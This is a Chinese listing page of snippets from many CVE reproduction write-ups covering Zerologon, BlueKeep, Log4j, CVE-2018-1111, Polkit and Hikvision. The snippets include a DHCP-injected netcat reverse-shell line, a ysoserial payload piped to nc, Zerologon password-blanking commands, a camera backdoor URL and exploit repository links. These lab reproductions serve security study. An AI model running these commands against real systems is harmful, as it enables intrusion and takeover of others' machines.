首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏今天有没有多懂一点工业安全

    CVE漏洞复现CVE-2023-32233

    [漏洞名称]:CVE-2023-32233 NetFilter权限提升 [漏洞描述]:由研究人员 Patryk Sondej (波兰)和 Piotr Krysiuk(爱尔兰)发现,Linux 内核的 poc二进制文件: 输入:gcc -Wall -o exploit exploit.c -lmnl -lnftnl 如果觉得以上太困难 个人推荐去大佬的环境下载地址,里面有做好的镜像,可以直接进行下面复现过程 pwd=8888 [复现过程]: 输入命令:cd ~ ls 查看根目录: 执行编译好的exp文件: . /exp 成功得到root权限: [参考资料]: Liuk3r/CVE-2023-32233:CVE-2023-32233:Linux内核中的安全漏洞CVE-2023-32233 (github.com ) CVE漏洞复现-CVE-2023-32233 NetFilter权限提升-CSDN博客 CVE-2023-32233 (LINUX内核权限提升漏洞)_cve-2023 提权-CSDN博客

    1.1K10编辑于 2024-07-17
  • 来自专栏字节脉搏实验室

    CVE-2019-1388+CVE-2019-0803复现

    作者-ohh 本次测试环境为w7 1.cve-2019-1388利用工具:https://github.com/jas502n/CVE-2019-1388 cve-2019-1388提权影响范围如下: link OPENED AS SYSTEM ** Windows 2019 17763 link NOT opened WORKSTATION =========== Windows 7 2.cve-2019-0803利用工具: https://github.com/k8gege/K8tools/blob/master/CVE-2019-0803.exe 漏洞影响范围: ? for x64-based Systems SP1 Microsoft Windows 7 for 32-bit Systems SP1 Microsoft Windows 10 Version 1809 cve-2019-0803 cmd “net user admin999 admin /add” ?

    1.2K20发布于 2020-04-20
  • 来自专栏ChaMd5安全团队

    CVE-2018-1111复现

    近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。 复现 环境 kali x64 centos 7 vmware14 设置网络 断开kali和centos的网络 将kali和centos都设置成主机模式,并且关闭主机的dhcp功能 ? –dhcp-option=”252,x’&nc -e /bin/bash 10.1.1.1 1337 #” 范围 本地测试fedora28、centos7通过,而centos6,redhat5未通过(~

    1.1K20发布于 2018-07-25
  • 来自专栏Ms08067安全实验室

    漏洞复现 | CVE‐2017‐5645

    本文作者:Taoing(Ms08067实验室 SRSP TEAM 核心成员) Apache Log4j Server 反序列化命令执行漏洞(CVE‐2017‐5645) 一、漏洞原理 Apache 二、环境搭建 cd /vulhub/log4j/CVE‐2017‐5645 #进入环境目录 docker‐compose build && docker‐compose up ‐d 三、漏洞复现 payload 使用ysoserial生成payload,然后直接发送给your‐ip:4712端口即可。 java ‐jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE‐2017‐5645_is_succe ss" | nc your‐ip 4712 执行docker‐compose exec log4j bash进容器 可见 /tmp/CVE‐2017‐5645_is_success已成功创建: ?

    2.9K10发布于 2020-09-22
  • 来自专栏c2k2o6

    cve-2021-4034复现

    cve-2021-4034复现 影响范围 exp 打码 复现 参考 cve-2021-4034复现 Linux Polkit 本地提权漏洞 cvss评分 7.8 高危 polkit的pkexec 存在本地权限提升漏洞 ))(*argv, None) cenv = (c_char_p * (len(envp) + 1))(*envp, None) libc.execve(cmd, cargv, cenv) # 执行 复现

    2K10编辑于 2022-01-27
  • 来自专栏黑伞安全

    CVE-2020-1472复现指北

    -2020-1472 cd CVE-2020-1472\ pip install -r requirements.txt python zerologon_tester.py DC_NETBIOS_NAME 整个利用过程大概是下列流程 置空域控保存在AD中的密码 获取域控用户HASH 通过获取到的管理员HASH得到一个SHELL,然后连接上去导出原来计算机中本地保存的HASH 通过获取到的HASH恢复置空的域控密码 利用复现 下载EXP # ~/impacket/ cd examples git clone https://github.com/dirkjanm/CVE-2020-1472 cd CVE-2020-1472 \ 置空密码 # ~impacket/examples/CVE-2020-1472 python cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR 然后我们保存上图中红框部分,即 # ORI_HASH c165a47a84dce08168cc7f52d9b44712 恢复HASH # ~impacket/examples/zerologon git

    2.3K148发布于 2020-09-18
  • 来自专栏信安之路

    CVE2018-1111 漏洞复现

    本文作者:\xeb\xfe(来自信安之路作者团队) 近日,红帽官方发布了安全更新,修复了编号为 CVE-2018-1111 的远程代码执行漏洞,攻击者可以通过伪造 DHCP 服务器发送响应包,攻击红帽系统 影响版本 1、Red Hat Enterprise Linux Server 6 2、Red Hat Enterprise Linux Server 7 3、CentOS 6 4、CentOS 7 漏洞详情 漏洞复现过程 环境准备 这里我用的测试机器系统分别是Centos 7 和 Kali 2018.2。 Centos 7 作为被攻击机,需要设置自动获取 ip 地址。 CVE2018-1111 漏洞复现到此结束~! 通过本文,大家可以学习到如何用 dnsmasq 来快速搭建一个 DNS 服务或者 DHCP 服务,并对 DHCP 服务的 option 部分值和含义有相关了解,以及学习了 CVE2018-1111 漏洞的复现及环境搭建

    1.4K00发布于 2018-08-08
  • 来自专栏漏洞知识库

    Windows COM 特权提升漏洞Win7复现-CVE-2017-0213

    漏洞知识库 专注于红队攻防研究 关注 Win7复现-CVE-2017-0213 该漏洞形成的原因 类型混淆的漏洞通常可以通过内存损坏的方式来进行利用.然而漏洞发现者在利用时,并未采用内存损坏的方式来进行漏洞利用 CVE-2017-0213 Windows COM 特权提升漏洞组件先看看这个漏洞的介绍: http://www.voidcn.com/article/p-ukjxxpit-boa.html 漏洞影响的版本有 复现步骤 使用Win7用户创建一个用户 net user powerliu 123456 /add ? 创建用户失败:拒绝访问 运行:CVE-2017-0213_x64 ?

    1.6K10发布于 2019-11-20
  • 来自专栏安全漏洞环境学习

    CVE-2017-8464漏洞复现

    CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

    99540发布于 2019-09-24
  • 来自专栏BM CTF

    CVE-2022-32991靶场复现

    CVE官方给出的提示: welcome.php页面存在SQL注入,并且这个参数是eid 打开靶场环境: 页面是一个登陆注册的界面 用户注册: 1 01@0.com 123456 执行如下命令: sqlmap -r flag.txt -D ctf -T flag -C flag --dump --batch 回显如下: 得出flag: flag{cdadbe80-6b13-4ce7-

    63130编辑于 2023-10-28
  • 来自专栏渗透云笔记

    CVE 2019 0708 复现过程笔记

    个人学习笔记 GitHub地址;https://github.com/TinToSer/bluekeep-exploit kali2019已经集成了这个exp 测试终端 为VM系统里的win7 问题 windows7设置 ? kali 设置 ? 现在两个机器能ping通 然后本次演练的机子并没有0708这个漏洞我就简单操作下 其实是家里网慢对应版本的靶子有收集过 ed2k://|file|cn_windows_7_ultimate_with_sp1 3420557312|B58548681854236C7939003B583A8078|/ 可以自行下载学习 在github上找到了k8师傅写的批量检测工具; https://github.com/k8gege/CVE A3%80%E6%B5%8B%E5%B7%A5%E5%85%B7 虽然说知道没有但是还是要nmap简单扫下,常规操作 ?

    70710发布于 2020-02-17
  • 来自专栏字节脉搏实验室

    CVE-2017-7921漏洞复现

    作者-Beginner 0x01 CVE-2017-7921漏洞复现 许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。 ? 0x02 漏洞复现: 利用Goby发现漏洞(CVE-2017-7921): ? 利用路径:/Security/users?auth=YWRtaW46MTEK 附:检索所有用户及其角色的列表 ?

    7.7K21发布于 2020-10-27
  • 来自专栏Script Boy (CN-SIMO)

    CVE-2020-2551复现过程

    项目地址 cnsimo/CVE-2020-2551 CVE-2020-2551 weblogic iiop 反序列化漏洞 该项目的搭建脚本在10.3.6版本经过测试,12版本未测试。 使用方法 先git clone https://github.com/cnsimo/CVE-2020-2551.git克隆本项目到本地。 建议所有操作都在一台机器上复现,避免网络问题导致的复现失败! ---- 项目引用 WeblogicEnvironment CVE-2020-2551 漏洞分析参考 WebLogic WLS核心组件RCE分析(CVE-2020-2551) - 安全客,安全资讯平台 Weblogic CVE-2020-2551 IIOP协议反序列化RCE – Y4er的博客 漫谈 WebLogic-CVE-2020-2551

    1.9K20发布于 2020-04-08
  • 来自专栏安全漏洞环境学习

    CVE-2019-0708漏洞复现

    前不久关于RDP的0708漏洞网上一片哀嚎,今天测试复现了一下,发现攻击之后,都会使得系统蓝屏。 CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。 0X1 漏洞影响 漏洞影响了很大一部分系统版本: Windows 7 Windows Server 2008 Windows Server 2008 R2 Windows 2003 0X2 漏洞检测 各个厂家都已经发布了检测工具,在这里,我们使用开源的检测脚本,在msf上加载即可使用,下载链接: https://github.com/zerosum0x0/CVE 用该脚本测试了XP/Win7发现最后都是的目标环境蓝屏了 ? 目前已经暴露出来的POC都是测试和验证漏洞存在以及简单的DOS测试,预计后面通过漏洞发送恶意软件和命令的事件会有一波吧!

    1.6K20发布于 2019-09-24
  • 来自专栏农夫安全

    CVE-2017-11882漏洞复现

    2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。 Microsoft Office 2016 0x01 环境清单 WindowsServer 2008 (192.168.3.114) Office 2007 MAC OSX(192.168.3.106) 0X02 复现过程 将生成的hta文档放入WebServer根目录:http://192.168.3.106/evil.hta python webdav_exec_CVE-2017-11882.py -u http:// 我(Cobalt Strike)本地监听了一个8081端口,用来接收客户端的Shell 要生成一个rtf/doc文档,github上已有生成脚本 webdav_exec_CVE-2017-11882.py -> http://payloads.online/tools/cve-2017-11882/webdav_exec_CVE-2017-11882.py 生成rtf文档: 最后将test.rtf在目标机器上执行

    1.3K80发布于 2018-03-30
  • 来自专栏betasec

    CVE-2019-0708 本地复现

    0x02:复现环境 首先搭建环境,我这里使用的是win7旗舰版(家庭版升级而来),KALI自带的v5.0.45版本MSF。 (一) win7环境搭建 在VMware 14中安装windows7 SP1版本模拟受害机,在这里用的是清水表哥提供的系统。 \ target 使用set RHOSTS 设置靶机IP 使用set RPORT 设置靶机PORT 使用set target ID数字(可选为1-4)每种都代表了机器架构 在我的复现环境中使用 -2019-0708远程桌面代码执行漏洞复现: https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961? from=groupmessage 添加CVE-2019-0708: https://github.com/rapid7/metasploit-framework/pull/12283/files

    2.5K20发布于 2020-07-31
  • 来自专栏一名白帽的成长史

    【漏洞复现】Weblogic漏洞搭建与复现CVE-2017-10271

    今天一起来看看CVE-2017-10271的复现吧~ ? ? Part.1 漏洞说明 漏洞说明 1、漏洞描述 WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序 部署CVE-2017-10271: ? 查看虚拟机状态: ? 可以看到端口映射到了7001,尝试访问: ? 成功,搭建完毕~ ? Part.3 漏洞复现 漏洞检测 可以直接使用工具进行漏洞检测: ?

    7K10发布于 2020-02-25
  • 来自专栏内网安全学习笔记

    CVE-2021-42287CVE-2021-42278分析复现

    距离漏洞披露已经过了许久,现在终于有些空余时间用于学习复现这两个漏洞。 概括 CVE-2021-42278,机器账户的名称一般用$结尾,但AD并未对域内机器账户名进行验证。 CVE-2021-42287, 结合上述42278漏洞,创建一个与DC机器账户名称相同的机器账户(不以$结尾),使用该账户请求一个TGT后,修改账户名,然后通过S4U2Self申请TGS Ticket, 利用原理:如果域内存在一台域控名为DC(机器账户为DC)的域控机,此时攻击者可利用CVE-2021-42287漏洞去申请一个机器账户,再将机器账户的sAMAccountName修改为DC。 复现过程: 手动实现 1.创建机器账户 拿到域成员权限后,利用Powermad.ps1创建机器用户 Import-Module Poweremad.ps1 New-MachineAccount -MachineAccount

    1.7K20编辑于 2023-04-17
  • 来自专栏安全漏洞环境学习

    Flash CVE-2018-15982 漏洞复现

    攻击者精心准备了一份俄文内容的员工问卷文档,该文档使用了最新的Flash 0day漏洞CVE-2018-15982和带有自毁功能的专属木马程序进行攻击,种种技术细节表明该APT组织不惜代价要攻下目标,但同时又十分小心谨慎 0X1 环境搭建 攻击机:kali3.0 靶 机: Win7/Win10,安装flash旧版本 0X2 漏洞利用 首先利用Metasploit的msfvenom创建payload攻击程序: ? set LHOST 192.168.0.104 set RC4PASSWORD zale 接下来,我们生成攻击的程序和网页,生成脚本EXP下载地址: https://github.com/Ridter/CVE 我们在Win7上安装的flag版本是:Adobe_Flash_Player_28.0.0.111版本 安装完毕后,访问kali的http服务: ?

    1.1K10发布于 2019-09-24
  • 来自专栏安全漏洞环境学习

    Flash CVE-2018-4878漏洞复现

    日发布了一条安全公告: https://helpx.adobe.com/security/products/flash-player/apsa18-01.html 公告称一个新的Flash 0Day漏洞(CVE 0x02 漏洞影响 Flash Player当前最新版本28.0.0.137以及之前的所有版本 0x03 漏洞复现 环境测试: 攻击机:kali 目标靶机:win7x64 +IE8.0+FLASH player28.0.0.137 链接是:https://github.com/anbai-inc/CVE-2018-4878 ? 将exp脚本放入kali下和index.html同一个目录下,生成恶意的swf文件,注意脚本下生成swf的目录是/opt/CVE-2018-4878,可以自定义修改目录 ? 为了让win7访问恶意文件,我们开启kali的web服务,将swf文件放到www目录下: ? 在msf下监听: ? 开始进行监听之后,在win7上用ie打开197的80端口服务: ?

    1.1K20发布于 2019-09-24
领券